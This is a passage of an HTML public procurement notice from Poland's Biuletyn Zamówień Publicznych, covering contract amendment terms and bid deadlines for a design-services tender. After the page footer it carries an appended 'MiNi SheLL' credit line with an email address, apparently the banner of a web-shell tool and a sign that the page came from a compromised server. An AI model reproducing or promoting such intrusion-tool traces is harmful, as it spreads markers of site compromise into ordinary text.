zamówienia.7. Zamawiający nie<br/>zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia kluczowych zadań.8. Przed podpisaniem umowy od<br/>Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została<br/>wybrana Zamawiający będzie żądać umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> treści oferty, dotyczące zmiany terminu realizacji zamówienia, wynagrodzenia oraz zakresu<br/>przedmiotowego zamówienia, w przypadkach określonych w umowie oraz ust. 2 i 3.2. Strony<br/>dopuszczają wydłużenie terminu realizacji umowy: 1) wynikające z opóźnień w uzyskaniu<br/>decyzji administracyjnych, których pozyskanie następuje w terminie niezależnym od<br/>Wykonawcy, przy czym przyjmuje się że: a) wydanie decyzji o pozwoleniu na budowę – do 65<br/>dni od dnia złożenia kompletnego wniosku do Zamawiającego,b) wydanie innych decyzji<br/>administracyjnych – do 60 dni od daty złożenia kompletnego wniosku do Zamawiającego,2)<br/>przedłużające się powyżej 30 dni, nie z winy Wykonawcy, uzyskiwanie niezbędnych do<br/>projektowania opinii, uzgodnień, warunków technicznych i innych materiałów, 3) w przypadku,<br/>gdy zaistnieją okoliczności określone w § 4 ust. 3 umowy zdanie drugie,3. Zamawiający<br/>dopuszcza możliwość zmiany zakresu przedmiotu umowy przy jednoczesnym odpowiednim<br/>zmniejszeniu wynagrodzenia, jeżeli okaże się, że niektóre elementy składowe dokumentacji<br/>projektowej będą zbędne z punktu widzenia postępowania administracyjnego lub procesu<br/>inwestycyjnego, czego nie można było przewidzieć w chwili zawarcia umowy. Zmiana zakresu<br/>przedmiotu umowy nie może powodować zmiany wynagrodzenia o więcej niż 60%<br/>wynagrodzenia określonego w §5 ust. 1. umowy 4. W przypadku ustawowej zmiany stawek<br/>podatku od towarów i usług w trakcie realizacji umowy – w zakresie dotyczącym nie<br/>zrealizowanej części przedmiotu umowy – wynagrodzenie ryczałtowe (brutto) zostanie<br/>odpowiednio zmodyfikowane.5. Wszelkie zmiany niniejszej umowy mogą być dokonywane pod<br/>rygorem nieważności na podstawie aneksów do umowy sporządzonych w formie pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-27 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-25</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-16 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com